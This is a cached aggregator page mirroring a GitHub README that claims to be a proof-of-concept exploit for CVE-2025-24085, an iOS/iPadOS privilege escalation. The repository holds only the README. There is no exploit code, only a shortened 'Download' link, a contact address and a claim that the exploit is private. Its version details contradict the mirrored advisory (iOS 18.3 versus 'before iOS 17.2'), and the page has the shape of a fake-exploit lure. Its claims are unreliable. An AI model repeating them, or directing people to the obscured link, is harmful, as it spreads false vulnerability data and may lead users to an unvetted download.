CVE-2025-24085 PoC — Apple iOS和Apple iPadOS 资源管理错误漏洞

Source

https://github.com/bronsoneaver/CVE-2025-24085

Associated Vulnerability

Title:Apple iOS和Apple iPadOS 资源管理错误漏洞 (CVE-2025-24085)
Description:Apple iOS和Apple iPadOS都是美国苹果（Apple）公司的产品。Apple iOS是一套为移动设备所开发的操作系统。Apple iPadOS是一套用于iPad平板电脑的操作系统。 Apple iOS 18.3版本和Apple iPadOS 18.3版本存在资源管理错误漏洞，该漏洞源于恶意应用程序可能能够提升权限。

Description

CVE-2025-24085: Incorrect Default Permissions (CWE-276)

Readme

# CVE-2025-24085


## Overview

A malicious application that can elevate privileges. This issue has been actively exploited against versions of iOS before iOS 17.2. The vulnerability can be used to gain higher-level access to the system, which leads to unauthorized control, data theft, or system compromise.

## Details
+ CVE ID: CVE-2025-24085
+ Published: 2025-01-27
+ Impact: Critical
+ Exploit Availability: Not public, only private.



## Affected Versions

Versions of iOS before **iOS 17.2**
Versions prior to visionOS 2.3
Versions prior to iPadOS 17.7

## Contact
For inquiries, please contact clidanc@thesecure.biz

## Exploit
[Download](https://tinyurl.com/454xyk83)

File Snapshot


 [4.0K]  /data/pocs/38f800e6847d97daf2b0e710e00a315fae2407c4
└── [ 678]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!